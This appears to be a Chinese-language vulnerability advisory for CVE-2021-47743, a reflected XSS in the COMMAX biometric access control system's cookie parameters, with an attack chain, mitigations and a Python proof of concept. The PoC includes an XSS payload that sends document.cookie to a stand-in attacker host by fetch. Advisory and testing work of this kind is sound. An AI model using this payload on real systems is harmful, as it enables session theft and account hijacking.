COMMAX生物识别门禁系统Cookie参数反射型XSS漏洞(CVE-2021-47743)

漏洞信息

漏洞编号

CVE-2021-47743

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

COMMAX Biometric Access Control System 1.0.0

漏洞概述

COMMAX Biometric Access Control System 1.0.0是一款由韩国COMMAX公司生产的生物识别门禁控制系统。该系统存在一个严重的未认证反射型跨站脚本(XSS)漏洞，漏洞位于Cookie参数'CMX_ADMIN_NM'和'CMX_COMPLEX_NM'中。攻击者可以通过构造恶意的Cookie值，将任意HTML或JavaScript代码注入到受害者的浏览器会话中。由于该漏洞不需要任何认证即可被利用，攻击者可以诱导目标用户访问包含恶意Cookie的链接，从而在用户浏览器中执行任意脚本代码。此类攻击可能导致会话劫持、敏感信息窃取、恶意内容注入等安全问题，对使用该门禁系统的企业和组织构成安全威胁。由于门禁系统通常涉及物理安全和企业敏感区域的管理，一旦攻击者成功利用此漏洞，可能进一步获取用户凭据或进行更深层次的渗透攻击。

技术细节

该漏洞是典型的反射型XSS(Non-Persistent XSS)漏洞，攻击原理如下：1)攻击者构造包含恶意JavaScript代码的Cookie参数'CMX_ADMIN_NM'或'CMX_COMPLEX_NM'；2)当受害者访问目标系统时，这些恶意的Cookie值被服务器反射回响应页面；3)由于系统未对Cookie值进行适当的输入验证和输出编码，恶意代码被浏览器解析执行。反射型XSS与存储型XSS的主要区别在于，恶意代码不会永久存储在服务器端，而是通过请求参数即时反射。攻击者通常通过钓鱼邮件、恶意链接或第三方网站诱导受害者触发漏洞利用链。由于Cookie通常在同源请求中自动发送，攻击者可以利用此特性窃取用户会话令牌、劫持账户或进行进一步的攻击侦查。漏洞影响的是系统的身份认证和用户管理模块，该模块使用Cookie存储管理员名称(CMX_ADMIN_NM)和建筑/小区名称(CMX_COMPLEX_NM)。

攻击链分析

STEP 1

步骤1

攻击者收集目标信息，确认目标系统使用COMMAX Biometric Access Control System 1.0.0

STEP 2

步骤2

攻击者构造包含XSS恶意载荷的Cookie参数(CMX_ADMIN_NM或CMX_COMPLEX_NM)

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意链接或社交工程诱导受害者访问目标系统

STEP 4

步骤4

受害者浏览器发送携带恶意Cookie的请求到目标服务器

STEP 5

步骤5

服务器未对Cookie值进行过滤或编码，直接反射到响应页面中

STEP 6

步骤6

受害者浏览器解析响应时执行注入的恶意JavaScript代码

STEP 7

步骤7

攻击者通过恶意脚本窃取用户会话Cookie、凭据或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2021-47743 PoC - COMMAX Biometric Access Control System XSS
# Target: COMMAX Biometric Access Control System 1.0.0
# Vulnerability: Unauthenticated Reflected XSS via Cookie Parameters

target_url = "http://target.com/cmx/login"

# Malicious XSS payload in CMX_ADMIN_NM cookie
xss_payload_admin = "<script>alert(document.cookie)</script>"
# Malicious XSS payload in CMX_COMPLEX_NM cookie  
xss_payload_complex = "<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)></img>"

headers = {
    'Cookie': f'CMX_ADMIN_NM={xss_payload_admin}; CMX_COMPLEX_NM={xss_payload_complex}',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    if xss_payload_admin in response.text or xss_payload_complex in response.text:
        print('[+] XSS Payload reflected in response - Vulnerability confirmed!')
        print(f'[+] Status Code: {response.status_code}')
    else:
        print('[-] Payload not reflected - May not be vulnerable')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

影响范围

COMMAX Biometric Access Control System 1.0.0

防御指南

临时缓解措施

在厂商发布正式修复补丁前，可采取以下临时缓解措施：1)在前端代理或负载均衡器处配置输入过滤规则，对Cookie参数中的特殊字符(<、>、'、"、script等)进行过滤或编码；2)启用WAF的XSS防护规则，实时检测和阻断恶意请求；3)限制门禁系统的网络访问，仅允许受信任的内部网络访问管理界面；4)监控和分析Web服务器日志，及时发现异常请求模式；5)对管理员进行安全意识培训，避免点击可疑链接；6)考虑使用浏览器安全插件提供额外的XSS防护。